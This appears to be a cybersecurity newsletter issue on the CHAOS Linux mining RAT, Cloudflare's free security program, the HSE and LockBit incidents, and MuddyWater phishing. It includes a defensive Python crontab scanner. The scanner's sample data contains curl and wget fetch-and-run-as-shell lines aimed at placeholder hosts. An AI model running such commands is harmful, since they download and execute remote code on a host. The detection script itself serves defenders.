A cryptocurrency mining hacking campaign targeting Linux has been tracked by researchers. The hacking campaign uses CHAOS malware.
More:
- The first variant of this malware was tracked in November 2022, but the most recent variant that has been tracked shares many similarities.
- The CHAOS Remote Administrative Tool is based on an open-source project with files openly shared on GitHub.
- Once deployed, the Chaos malware first alters the /etc/crontab file, which belongs to the UNIX task scheduler, so that the malware downloads itself every 10 minutes.
- The main downloader script and other payloads are hosted in different locations to ensure the campaign remains active and spreads regardless of any potential external intervention.
- It is believed that the attack originated in Russia due to the fact that the main server is located in the country.
- Compiled in Go, the RAT deploys on the device and enables threat actors to:
  - Take screenshots
  - Delete files
  - Restore files
  - Restart the device, etc.
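A defender-side check for the crontab persistence described above, as an added example that is not taken from the researchers' report or from the malware: it scans /etc/crontab-format text for jobs that run every 10 minutes and fetch remote content. The fetcher names, the sample crontab and its hosts are constructed assumptions.

```python
import re

# Tools commonly used to fetch remote content (assumption, extend as needed).
FETCHERS = re.compile(r"\b(curl|wget)\b")
URL = re.compile(r"https?://[^\s\"'|;]+")

def minute_interval(field):
    """Return N if the minute field means 'every N minutes', else None."""
    m = re.fullmatch(r"(?:\*|0-59)/(\d+)", field)
    if m:
        return int(m.group(1))
    if re.fullmatch(r"\d+(,\d+)+", field):  # e.g. 0,10,20,30,40,50
        vals = sorted(int(v) for v in field.split(","))
        steps = {b - a for a, b in zip(vals, vals[1:])}
        if len(steps) == 1 and len(vals) * min(steps) == 60:
            return steps.pop()
    return None

def suspicious_entries(crontab_text, interval=10):
    """Flag system-crontab jobs on the given interval that download content."""
    findings = []
    for lineno, raw in enumerate(crontab_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*\s*=", line):
            continue  # environment assignment such as SHELL=/bin/sh
        parts = line.split(None, 6)  # 5 time fields, user, command
        if len(parts) < 7:
            continue  # @reboot-style or malformed entries are out of scope here
        minute, hour, user, command = parts[0], parts[1], parts[5], parts[6]
        if (minute_interval(minute) == interval and hour == "*"
                and FETCHERS.search(command)):
            findings.append({"line": lineno, "user": user,
                             "urls": URL.findall(command), "command": command})
    return findings

# Constructed sample; hosts use reserved documentation names and addresses.
SAMPLE = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root curl -fsSL http://downloader.example.invalid/s.sh | sh
*/10 * * * * root /usr/local/bin/rotate-metrics
0,10,20,30,40,50 * * * * root wget -q -O- http://203.0.113.7/x | bash
"""

if __name__ == "__main__":
    for hit in suspicious_entries(SAMPLE):
        print(hit["line"], hit["user"], hit["urls"])
```

On a live host, pass the contents of /etc/crontab and the files under /etc/cron.d, which use the same format with a user field.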
Cloudflare will provide free enterprise-level cybersecurity services to journalists, activists, humanitarian organizations, minority groups, and state and local election services. To implement the idea, Cloudflare will partner with Project Galileo and the Athenian Project.
More:
- The platform offers a secure internet access management solution for individuals and enterprises through its zero-trust product. A zero-trust strategy is when the network stops trusting the logged-in users unconditionally and validates every stage of digital interactions on protected networks.
- This process ensures that everyone who is part of the network (employees and company assets) is continuously verified.
- Cloudflare claims that some of the other main benefits that organizations have from using Cloudflare are:
  - Automatic protection against phishing attacks, blocking all threats before they reach user inboxes.
  - Rigid control over asset and app access for employees, partners, and volunteers.
  - Secure access to the internet even when using untrustworthy WiFi connections.
- This platform is currently used by 10,000 organizations worldwide.
- Organizations can apply for the security product suite here.
The cost of the cyberattack against Ireland's Health Care Service that occurred in 2021 has now reached $83M. Industry experts and officials expect the cost to reach $100M.
More:
- The cyberattack, believed to have been conducted by Russia-based state actors, was likely caused by a malicious Microsoft Excel file downloaded by an employee. The file was part of a phishing campaign.
- It is believed that the Excel file was opened at an HSE workstation in March 2021. The malware was only discovered two months later, meaning that hackers managed to hide their activity during this period.
- Around 100,000 people had their personal data stolen during this cyber-attack.
- According to government officials, at the time of the attack, the National Cyber Security Centre only had 25 employees and no director, which, in hindsight, proved to be a huge liability for the country's healthcare system.
The California Department of Finance has been attacked by LockBit Ransomware Crew. The group claims to have stolen 76 GB worth of data.
More:
- LockBit claims it has stolen data such as:
  - databases,
  - confidential information,
  - financial documents,
  - and personal life information.
- The California Governor's Office of Emergency Services stated that it is currently responding to the ongoing threat.
- The hacker group has allegedly made a list of demands that need to be met by Dec. 24, but it is not clear what those demands are at the moment.
- While LockBit is one of the most dangerous hacker groups currently active, researchers claim that the group has been known to exaggerate its impact in the past, so any claims made now need to be extensively analyzed.
Iranian hacker group MuddyWater used corporate emails to hack its targets, according to a new report. The group has ties with Iran’s Ministry of Intelligence and Security.
More:
- The hacker group is tracked with different names, such as Static Kitten, Cobalt Ulster, Mercury, etc.
- It is believed that MuddyWater has been active since at least 2017.
- Victims still trusted the email since it came from a legitimate address belonging to a company they know.
- Among the targets in this campaign are two Egyptian hosting companies, one of them breached to send out phishing emails.
- Most Syncro installers used by MuddyWater are hosted on OneHub’s cloud storage, a service the actor used in the past for its hacking campaigns.
Quick Hits:
- Customer trust is critical, but creating a continuous security process for your startup can be complex. Learn from Vanta how to enhance security without overextending your resources.*
- According to a new report, there is a global gap of 3.4 million cybersecurity workers.
- Palo Alto Networks has launched Medical IoT Security, a Zero Trust security tool that aims to improve cybersecurity in the healthcare sector.
- Cybersecurity and risk management topped state chief information officers’ top priorities, according to an annual CIO report.
- Recruiting tech ROI of 227%? Here’s how Okta achieves its hiring goals using Greenhouse Recruiting and Greenhouse Onboarding.*
*This is a sponsored post.
Arbër is an Inside writer who also has experience in entrepreneurship. He has experience covering Consumer Tech, Venture Capital, NFTs, Crypto, etc. Arbër holds a Bachelor's degree in Business from XAMK University in Finland. When he is not reading (and writing) business news, he chooses to watch sports or anime...and then read news about sports or anime.
Editor: Aaron Crutchfield is based in the high desert of California. Over the last two decades, he has spent time writing and editing at various local newspapers and defense contractors in California. When he's not working, he can often be found looking at the latest memes with his kids or working on his 1962 and 1972 Fords.